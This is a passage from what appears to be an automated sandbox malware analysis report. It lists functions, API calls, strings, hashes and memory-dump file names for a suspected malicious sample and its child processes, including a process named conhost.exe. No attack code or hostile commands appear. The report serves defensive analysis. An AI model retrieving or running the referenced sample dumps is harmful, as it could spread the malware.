Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 8b8743c3c25ddeb697c2250a699c764c5677b113e9dc3baa29e2240e638690c3
Instruction ID: f6bb1fd4fc95812575bd383a28d8dcd52cda6107a216f89a6028d909742b004a
Opcode Fuzzy Hash: 8b8743c3c25ddeb697c2250a699c764c5677b113e9dc3baa29e2240e638690c3
Instruction Fuzzy Hash: 3B513CA5E08D4AD6EB10CB25E8417B92761FB14FBCF548231D91C87794CEBCE596C720

Function 00007FF612D31800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fprintf.MSVCRT ref: 00007FF612D3185A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF612D3184D
Unknown error, xrefs: 00007FF612D31824

Memory Dump Source

Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true

Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 6a04be2a5377543e6f5360f4a477f3baed8082d80598df8c86f2ffb9abe0366d
Instruction ID: ebefd67a362303ccb6f88c52513b16fe929899d6a58aa5ceadb24d402208c2f5
Opcode Fuzzy Hash: 6a04be2a5377543e6f5360f4a477f3baed8082d80598df8c86f2ffb9abe0366d
Instruction Fuzzy Hash: 97F0C251E18E8982E211DB24E9410B96360FB59BE9F409331DE4ED3251DFACF182C310

Function 00007FF612D3219E Relevance: 5.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF612D321B2
TlsGetValue.KERNEL32 ref: 00007FF612D321EB
GetLastError.KERNEL32 ref: 00007FF612D321F0
LeaveCriticalSection.KERNEL32 ref: 00007FF612D3226C

Memory Dump Source

Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true

Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: ca46d75936f49b974659a263795f574fa980eb51f7fd19c67d5382fb06102bed
Instruction ID: 0ac1aa46b6351dc2ef1b15abaad1b9608fab041887ee4b1843c9fd4eff32ef34
Opcode Fuzzy Hash: ca46d75936f49b974659a263795f574fa980eb51f7fd19c67d5382fb06102bed
Instruction Fuzzy Hash: FC01EC66E0DD0A85FA15CB11EE082751260BF04FF8F598231CE1DC3B94DFACAD95C220

Analysis Process: ograohtgkfie.exePID: 2696, Parent PID: 632COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1470
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF621A91160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF621A91156), ref: 00007FF621A911A5
_amsg_exit.MSVCRT(?,?,?,00007FF621A91156), ref: 00007FF621A911CC
_initterm.MSVCRT ref: 00007FF621A9120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF621A91156), ref: 00007FF621A9124E
malloc.MSVCRT ref: 00007FF621A9127E
strlen.MSVCRT ref: 00007FF621A912A4
malloc.MSVCRT ref: 00007FF621A912B0
memcpy.MSVCRT ref: 00007FF621A912C3
_cexit.MSVCRT(?,?,?,00007FF621A91156), ref: 00007FF621A9132D

Memory Dump Source

Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true

Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: 73d309c2beea73d93cb65a6f5d0f2b5c2ae28225b33121ea806aae5ad6748919
Instruction ID: 28a6bcc9676907d69995c1ed5a90bdfbdcd1e82f11097393ae9edf83c3e741fa
Opcode Fuzzy Hash: 73d309c2beea73d93cb65a6f5d0f2b5c2ae28225b33121ea806aae5ad6748919
Instruction Fuzzy Hash: 64515575A0D64681FF10AB65EDA137A23A0BF487A0F44C937CA0DC73A5DE3EA481C302

Function 00007FF621A91394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF621A91156), ref: 00007FF621A913F7

Memory Dump Source

Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true

Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: df53f7b1e899476c23fb165e9ece8f0bc6a2fcfd61ce6596995948ec7f7a5c88
Instruction ID: c5f1cfcbaf786c590e1d614cad71447ebf7fab743f9574c1d1540faea3791522
Opcode Fuzzy Hash: df53f7b1e899476c23fb165e9ece8f0bc6a2fcfd61ce6596995948ec7f7a5c88
Instruction Fuzzy Hash: 46F06671A0CB5186DB10DB51FC6156A77A1FB48790B009837E98EC6725DF3EE190CB41

Non-executed Functions

Function 00007FF621A93350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF621A933B2
memset.MSVCRT ref: 00007FF621A93445
wcscpy.MSVCRT ref: 00007FF621A9349D
wcscat.MSVCRT ref: 00007FF621A934A8
wcslen.MSVCRT ref: 00007FF621A934B9
memset.MSVCRT ref: 00007FF621A935D4
wcscpy.MSVCRT ref: 00007FF621A93635
wcscat.MSVCRT ref: 00007FF621A93640
wcslen.MSVCRT ref: 00007FF621A93654

Strings

@, xrefs: 00007FF621A934F1
, xrefs: 00007FF621A936DD
0, xrefs: 00007FF621A934E6
@, xrefs: 00007FF621A93698
0, xrefs: 00007FF621A9368D

Memory Dump Source

Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true

Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd

Similarity

API ID: memset$wcscatwcscpywcslen
String ID: $0$0$@$@
API String ID: 4263182637-1413854666
Opcode ID: 490bacf3545b7b8fc80e0b10f2766644d95de23be91c7042de06992202d40e5b
Instruction ID: dca1d4f49ab34edb4401104eb83d2e5ebfbab9cc505d34477407219b6e2c2206
Opcode Fuzzy Hash: 490bacf3545b7b8fc80e0b10f2766644d95de23be91c7042de06992202d40e5b
Instruction Fuzzy Hash: 97B1902191C6C295FB218B24E8153BB77B0FF84348F008636EA89C76A5DF7DD185CB42

Function 00007FF621A92690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncmp.MSVCRT ref: 00007FF621A92795
memset.MSVCRT ref: 00007FF621A92865
wcscpy.MSVCRT ref: 00007FF621A928CE
wcscat.MSVCRT ref: 00007FF621A928D9
wcslen.MSVCRT ref: 00007FF621A928E1
wcslen.MSVCRT ref: 00007FF621A928F6
wcslen.MSVCRT ref: 00007FF621A9296D
wcslen.MSVCRT ref: 00007FF621A929E8

Strings

X, xrefs: 00007FF621A92B79
`, xrefs: 00007FF621A92B91
0, xrefs: 00007FF621A9279A

Memory Dump Source

Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true

Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd

Similarity

API ID: wcslen$memsetwcscatwcscpywcsncmp
String ID: 0$X$`
API String ID: 329590056-2527496196
Opcode ID: 8dde73c9b64010c461290e6d9581102e111f0495f16f93885a92462792e7b513
Instruction ID: 42cb88f1c0638595b137f0d0ea7ee2db0cd93d618b349c0a91952a6bef95ef1b
Opcode Fuzzy Hash: 8dde73c9b64010c461290e6d9581102e111f0495f16f93885a92462792e7b513
Instruction Fuzzy Hash: 58026C22A1CBC191EB218B25E8543AA77A4FB857A4F008336DA9CC77E5DF7DD189C701

Function 00007FF621A91BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,?,?,?,00007FF621A991C0,00007FF621A991C0,?,?,00007FF621A90000,?,00007FF621A91991), ref: 00007FF621A91C63
VirtualProtect.KERNEL32(?,?,?,?,00007FF621A991C0,00007FF621A991C0,?,?,00007FF621A90000,?,00007FF621A91991), ref: 00007FF621A91CC7
memcpy.MSVCRT ref: 00007FF621A91CE0
GetLastError.KERNEL32(?,?,?,?,00007FF621A991C0,00007FF621A991C0,?,?,00007FF621A90000,?,00007FF621A91991), ref: 00007FF621A91D23

Strings

Address %p has no image-section, xrefs: 00007FF621A91CF4
VirtualProtect failed with code 0x%x, xrefs: 00007FF621A91D29
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF621A91D17

Memory Dump Source

Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true

Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: 9d1e4b83a29c56fd3109a824e6e1f3e6aa46fb5945b56ac49a4cb997ac10c929
Instruction ID: c3a22a557f1f59cd1b7d8a817965697ad6706a32a3285686511e8a1bb9982c9c
Opcode Fuzzy Hash: 9d1e4b83a29c56fd3109a824e6e1f3e6aa46fb5945b56ac49a4cb997ac10c929
Instruction Fuzzy Hash: 5F418E61A0CA5691EF219B55DC646B927A0EB84BE0F148533CE0EC37A1DE3EE585C302

Function 00007FF621A92104 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF621A92118
TlsGetValue.KERNEL32 ref: 00007FF621A9214F
GetLastError.KERNEL32 ref: 00007FF621A92154
LeaveCriticalSection.KERNEL32 ref: 00007FF621A92212
free.MSVCRT ref: 00007FF621A92234
DeleteCriticalSection.KERNEL32 ref: 00007FF621A9225D

Memory Dump Source

Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true

Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd

Similarity

API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
String ID:
API String ID: 3326252324-0
Opcode ID: 38e3c1362194875042f0d287631ebe0d18285824619c025f5ce5c131483a81ea
Instruction ID: c8490465ba9a69d87d8b56babcdea9c00b800bae2e47c14d1a85c6373f53440b
Opcode Fuzzy Hash: 38e3c1362194875042f0d287631ebe0d18285824619c025f5ce5c131483a81ea
Instruction Fuzzy Hash: 1821C324A0DA12C1FF1A9B65ED642742260BF40B90F548A73C91EC77A4DF7EA886C302

Function 00007FF621A91E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CCG , xrefs: 00007FF621A91E27

Memory Dump Source

Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true

Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: 636ac494cce984edb064c3aed41a9ca65764b02bd37c4c677f53efd8ed5c70d9
Instruction ID: d13f84ec6cc89b7c77bfd66bb20b702cf9349b907048335532d296da20d8cedb
Opcode Fuzzy Hash: 636ac494cce984edb064c3aed41a9ca65764b02bd37c4c677f53efd8ed5c70d9
Instruction Fuzzy Hash: 83217A26F0C10E41FF6542599EA037911819F987B8F25CA37DA1DC33D9DF2EACC28242

Function 00007FF621A91880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF621A91247), ref: 00007FF621A919F9

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF621A91B7B
Unknown pseudo relocation protocol version %d., xrefs: 00007FF621A91B8B

Memory Dump Source

Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true

Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 8b8743c3c25ddeb697c2250a699c764c5677b113e9dc3baa29e2240e638690c3
Instruction ID: 2747fcf72da5a3007014866d3dcc459bc0c656711eefb6b7a897c072e60ab5ec
Opcode Fuzzy Hash: 8b8743c3c25ddeb697c2250a699c764c5677b113e9dc3baa29e2240e638690c3
Instruction Fuzzy Hash: A3517D66F0C556D6EF108B25DC607B927A1EB04BA4F048232D91DC7BA5DE3EE9C6C702

Function 00007FF621A91800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fprintf.MSVCRT ref: 00007FF621A9185A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF621A9184D
Unknown error, xrefs: 00007FF621A91824

Memory Dump Source

Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true

Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 6a04be2a5377543e6f5360f4a477f3baed8082d80598df8c86f2ffb9abe0366d
Instruction ID: 1868860db12813f265af91eb06f015286744dfac76d27b3d881872278e02bb5d
Opcode Fuzzy Hash: 6a04be2a5377543e6f5360f4a477f3baed8082d80598df8c86f2ffb9abe0366d
Instruction Fuzzy Hash: AEF0C212E1DA8982EB119B24AD510B96360EB597D1F50D632DE4DD7255DF2DE1C2C301

Function 00007FF621A9219E Relevance: 5.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF621A921B2
TlsGetValue.KERNEL32 ref: 00007FF621A921EB
GetLastError.KERNEL32 ref: 00007FF621A921F0
LeaveCriticalSection.KERNEL32 ref: 00007FF621A9226C

Memory Dump Source

Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true

Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: ca46d75936f49b974659a263795f574fa980eb51f7fd19c67d5382fb06102bed
Instruction ID: d8cf763de8ab6202658091313157ad5a2acb153097e0f5152476496748f0eb87
Opcode Fuzzy Hash: ca46d75936f49b974659a263795f574fa980eb51f7fd19c67d5382fb06102bed
Instruction Fuzzy Hash: AD01D665A0E602D2FF168B61ED642782260BF54B90F558533CA1DC37A4DF3EA9D5C202

Analysis Process: conhost.exePID: 2792, Parent PID: 2696COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	859
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtApphelpCacheControl.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7

Memory Dump Source

Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_140000000_conhost.jbxd

Similarity

API ID: ApphelpCacheControl
String ID:
API String ID: 3871645765-0
Opcode ID: ec9a092489e5af3e4fa2fdc8bbbcd821a4cad9fc74f03f2b94582c83f0695141
Instruction ID: e197de5498146d0b926ee23ee756be57bf4454c479619e39ddad1fc15c59c4ee
Opcode Fuzzy Hash: ec9a092489e5af3e4fa2fdc8bbbcd821a4cad9fc74f03f2b94582c83f0695141
Instruction Fuzzy Hash: 47F09DB2608B40C6EAA2DB52F89579A77A4F38D7C4F009919BFC843735DB38C1948F44

Non-executed Functions

Function 00000001400026E0 Relevance: 21.4, APIs: 9, Strings: 3, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0000000140002720
wcsncmp.MSVCRT ref: 00000001400028F4
memset.MSVCRT ref: 00000001400029BC
wcscpy.MSVCRT ref: 0000000140002A25
wcscat.MSVCRT ref: 0000000140002A30
wcslen.MSVCRT ref: 0000000140002A38
wcslen.MSVCRT ref: 0000000140002A50
wcslen.MSVCRT ref: 0000000140002AB0
wcslen.MSVCRT ref: 0000000140002B02

Strings

0, xrefs: 00000001400028F9
X, xrefs: 0000000140002C93
`, xrefs: 0000000140002CAB

Memory Dump Source

Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_140000000_conhost.jbxd

Similarity

API ID: wcslen$memset$wcscatwcscpywcsncmp
String ID: 0$X$`
API String ID: 780471329-2527496196
Opcode ID: 8a8d5d6375714077ba8ded8dc44350f0e0889e319027c8e0974b10fb53a6a3b9
Instruction ID: 38bdbc93d83a365de9f41c25a29d06bffb51846884160dca96ebd204792c2ef8
Opcode Fuzzy Hash: 8a8d5d6375714077ba8ded8dc44350f0e0889e319027c8e0974b10fb53a6a3b9
Instruction Fuzzy Hash: A31237B2618BC086E762CB16F8443EA77A4F789794F404215EBA957BF5EF78C189C700

Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,0000000140001156), ref: 00000001400011A5
_amsg_exit.MSVCRT(?,?,?,0000000140001156), ref: 00000001400011CC
_initterm.MSVCRT ref: 000000014000120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,0000000140001156), ref: 000000014000124E
malloc.MSVCRT ref: 000000014000127E
strlen.MSVCRT ref: 00000001400012A4
malloc.MSVCRT ref: 00000001400012B0
memcpy.MSVCRT ref: 00000001400012C3
_cexit.MSVCRT(?,?,?,0000000140001156), ref: 000000014000132D

Memory Dump Source

Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_140000000_conhost.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: fa08311d13287933522aa3b3acb558fe216e304684c83b91bee948eec2286b12
Instruction ID: ebd3d17da5faede283770bb78fa2404d61df290fa4322c1b470fb34d0ad76b6f
Opcode Fuzzy Hash: fa08311d13287933522aa3b3acb558fe216e304684c83b91bee948eec2286b12
Instruction Fuzzy Hash: 135107B5611A4485FA66EF27F9543EA27A1B78D7C0F449025FF4E973B2DE38C4958300

Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,?,?,?,0000000140006B30,0000000140006B30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
VirtualProtect.KERNEL32(?,?,?,?,0000000140006B30,0000000140006B30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
memcpy.MSVCRT ref: 0000000140001CE0
GetLastError.KERNEL32(?,?,?,?,0000000140006B30,0000000140006B30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23

Strings

VirtualProtect failed with code 0x%x, xrefs: 0000000140001D29
Address %p has no image-section, xrefs: 0000000140001CF4
VirtualQuery failed for %d bytes at address %p, xrefs: 0000000140001D17

Memory Dump Source

